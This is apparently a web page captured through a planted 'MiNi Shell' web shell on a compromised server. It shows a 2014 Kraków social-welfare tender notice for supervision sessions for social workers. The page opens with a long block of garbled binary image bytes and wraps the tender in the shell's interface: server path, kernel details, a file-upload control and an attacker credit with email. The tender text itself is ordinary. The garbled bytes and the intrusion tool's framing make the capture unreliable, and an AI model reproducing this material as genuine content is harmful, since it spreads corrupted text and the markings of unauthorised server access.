JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/59198-N-2014.html

<p class="kh_header"><b>Kraków: Zorganizowanie i przeprowadzenie superwizji dla pracowników socjalnych</b><br>
<b>Numer ogłoszenia: 59198 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 12 6165482, 6165469, faks 12 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie superwizji dla pracowników socjalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie superwizji dla pracowników socjalnych  realizujących kontrakty socjalne lub program integracji społecznej                          i zawodowej osób niepełnosprawnych działających na rzecz uczestników projektu Pora na aktywność oraz superwizji pracowników socjalnych realizujących działania na rzecz osób doświadczających przemocy w rodzinie oraz jej sprawców. Zamówienie zostało podzielone na 3 części.

I część zamówienia
Przedmiotem I części zamówienia jest przeprowadzenie superwizji pracowników socjalnych realizujących kontrakty socjalne i program integracji społecznej i zawodowej osób niepełnosprawnych w ramach projektu                             Pora na aktywność. Zajęcia zostaną przeprowadzone dla 2 grup po 4 godziny zegarowe                          (w tym 15 minut przerwy). Liczebność każdej grupy 7-10 osób.Termin realizacji usługi: od dnia podpisania umowy, w terminie ogłoszonym przez Zamawiającego do 28 listopada 2014 roku z wyłączeniem lipca lub sierpnia. Podpisanie umowy oraz rozpoczęcie świadczenia usług przewiduje się na marzec 2014 roku. W trakcie realizacji umowy Wykonawca zobowiązany jest odbyć 25 spotkań                     (100 godzin) usługi, w tym 13 spotkań dla 1 grupy - 52 godziny usługi; 12 spotkań                dla 2 grupy  - 48 godzin usługi.
II część zamówienia
Przedmiotem II części zamówienia jest przeprowadzenie superwizji pracowników socjalnych realizujących kontrakty socjalne i program integracji społecznej i zawodowej osób niepełnosprawnych w ramach projektu Pora na aktywność  
Zajęcia zostaną przeprowadzone dla 2 grup po 4 godziny zegarowe                                 (w tym 15 minut przerwy). Liczebność każdej grupy 7-10 osób.
Termin realizacji usługi: od dnia podpisania umowy, w terminie ogłoszonym przez Zamawiającego do 28 listopada 2014 roku z wyłączeniem lipca lub sierpnia. Podpisanie umowy oraz rozpoczęcie świadczenia usług przewiduje się na marzec 2014 roku. W trakcie realizacji umowy Wykonawca zobowiązany jest odbyć 25 spotkań (100 godzin) usługi, w tym 13 spotkań dla 1 grupy - 52 godziny usługi; 12 spotkań dla 2 grupy  - 48 godzin usługi.
III część zamówienia
Przedmiotem III części zamówienia jest przeprowadzenie superwizji pracowników socjalnych realizujących działania na rzecz osób doświadczających przemocy w rodzinie oraz jej sprawców.
Zajęcia dla 1 grupy, liczącej od 7 do 10 osób, po 4 godziny zegarowe miesięcznie (w tym 15 minut przerwy). 
Termin realizacji usługi: od dnia podpisania umowy, w terminie ogłoszonym przez Zamawiającego do 28 listopada 2014 roku z wyłączeniem lipca lub sierpnia. Podpisanie umowy oraz rozpoczęcie świadczenia usług przewiduje się na marzec                 2014 roku. W trakcie realizacji umowy Wykonawca zobowiązany jest odbyć                   łącznie 8 spotkań (maksymalnie 32 godziny - 8 spotkań x 4 godziny).
Postanowienia wspólne dla wszystkich części zamówienia:
1.	Zajęcia superwizji prowadzone będą w zakresie metodologii pracy w oparciu o Podejście Skoncentrowane na Rozwiązaniach (SFA). Zajęcia ukierunkowane będą na aktywizowanie osób uczestniczących w zajęciach tak, by stali się świadomi swoich umiejętności i dzięki temu udoskonalili swój warsztat pracy.                          Superwizje prowadzone będą na bazie własnych doświadczeń uczestników                       w oparciu o metody aktywizujące: m.in. odgrywanie ról, burzę mózgów,                        pytanie o cel, o motywowanie do zmiany, modelowanie zachowań, z zastosowaniem technik audiowizualnych. Osoby uczestniczące w zajęciach będą mieć 
za zadanie skupić się  na swoich mocnych stronach i aktywnie poszukiwać rozwiązań zaobserwowanych problemów. Superwizowani będą się dzielić doświadczeniami, przemyśleniami i wiedzą. Grupa udzieli wsparcia jej członkom. Zajęcia odbywać będą się w oparciu o zindywidualizowane podejście                          (praca w oparciu o konkretny przypadek). Wspólnie budowane będą plany pomocy klientom. Uczestnicy zajęć doskonalić będą umiejętności: pracy z grupą, interpretowania obserwacji prowadzonych w środowisku klienta, planowania pracy z klientem, negocjacji, asertywnego współdziałania z klientem, dokonywania oceny pracy klienta, wykorzystywania dostępnych narzędzi wpływu na klienta.                     Część zajęć będzie filmowana w celu późniejszej grupowej analizy udanych interakcji i umiejętności w zakresie komunikacji społecznej.
2.	Zajęcia w grupach będą odbywać się według ustalonego harmonogramu nie częściej niż co 2 tygodnie i nie rzadziej niż 1 raz w miesiącu, z wyłączeniem  lipca lub sierpnia.
3.	Usługa będzie realizowana w lokalu zapewnionym przez Zamawiającego. Wykonawca zapewnia: sprzęt niezbędny do realizacji usługi tj. komputer, flipczart lub tablicę, markery, rzutnik, sprzęt do filmowania usługi, w celu późniejszej grupowej analizy udanych interakcji i umiejętności w zakresie komunikacji społecznej. 
4.	Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną, dwie lub wszystkie części zamówienia. Zamawiający zastrzega jednak, że Wykonawca będący osobą fizyczną prowadzącą, bądź nieprowadzącą działalność gospodarczą, realizujący zamówienie osobiście może złożyć ofertę tylko na jedną spośród części I i II zamówienia oraz na część III.                                 Oznacza to, że w przypadku osób, o których mowa w zdaniu poprzedzającym nie dopuszcza się jednoczesnego złożenia oferty na części I i II.
5.	Wykonawca, przed rozpoczęciem realizacji usługi zobowiązany jest przedstawić Zamawiającemu harmonogram realizacji spotkań. Zamawiający zastrzega sobie prawo uczestnictwa w spotkaniach grup w celu potwierdzenia realizacji usługi zgodnie z umową.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego                             i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	w zakresie części I oraz II: 
a)	legitymującą się wykształceniem wyższym (ukończone studia II stopnia lub jednolite studia magisterskie), 
b)	posiadającą uprawnienia superwizora terapii (podejścia) skoncentrowanej na rozwiązaniach lub trenera terapii (podejścia) skoncentrowanej na rozwiązaniach, 
c)	posiadającą doświadczenie w prowadzeniu szkoleń z zakresu pracy socjalnej skoncentrowanej na rozwiązaniach w wymiarze minimum 100 godzin, 
d)	która przeprowadziła superwizję dla pracowników socjalnych w wymiarze nie mniejszym niż 100 godzin;
2)	w zakresie części III: 
a)	legitymującą się wykształceniem wyższym, 
b)	posiadającą uprawnienia w zakresie przeciwdziałania przemocy w rodzinie, 
c)	posiadającą co najmniej roczne (w ciągu 3 lat poprzedzających termin składania ofert) doświadczenie w pracy z osobami doświadczającymi przemocy w rodzinie
d)	posiadającą doświadczenie w prowadzeniu szkoleń w zakresie przeciwdziałania przemocy w rodzinie w wymiarze nie mniejszymi                     niż  100 godzin, 
e)	która przeprowadziła superwizję dla pracowników socjalnych z zakresu przeciwdziałania przemocy w rodzinie w wymiarze nie mniejszym niż 100 godzin. 
Warunek doświadczenia osoby zdolnej do wykonania zamówienia musi zostać wykazany w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie części I oraz II: 
a)	legitymującą się wykształceniem wyższym (ukończone studia II stopnia lub jednolite studia magisterskie), 
b)	posiadającą uprawnienia superwizora terapii (podejścia) skoncentrowanej na rozwiązaniach lub trenera terapii (podejścia) skoncentrowanej na rozwiązaniach, 
c)	posiadającą doświadczenie w prowadzeniu szkoleń z zakresu pracy socjalnej skoncentrowanej na rozwiązaniach w wymiarze minimum 100 godzin, 
d)	która przeprowadziła superwizję dla pracowników socjalnych w wymiarze nie mniejszym niż 100 godzin;
2)	w zakresie części III: 
a)	legitymującą się wykształceniem wyższym, 
b)	posiadającą uprawnienia w zakresie przeciwdziałania przemocy w rodzinie, 
c)	posiadającą co najmniej roczne (w ciągu 3 lat poprzedzających termin składania ofert) doświadczenie w pracy z osobami doświadczającymi przemocy w rodzinie
d)	posiadającą doświadczenie w prowadzeniu szkoleń w zakresie przeciwdziałania przemocy w rodzinie w wymiarze nie mniejszymi                     niż  100 godzin, 
e)	która przeprowadziła superwizję dla pracowników socjalnych z zakresu przeciwdziałania przemocy w rodzinie w wymiarze nie mniejszym niż 100 godzin. 
Warunek doświadczenia osoby zdolnej do wykonania zamówienia musi zostać wykazany w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Wymiar udokumentowanego doświadczenia - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu z zastrzeżeniem art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2013 roku, poz. 907                                     z późniejszymi zmianami)
2.Zamawiający dopuszcza zmianę treści umowy w zakresie:
1)	warunków płatności,
2)	terminu realizacji usługi,
3.	Zmiany treści umowy dopuszczone w ust. 2 nie mogą prowadzić do zwiększenia wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
pok. 012.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com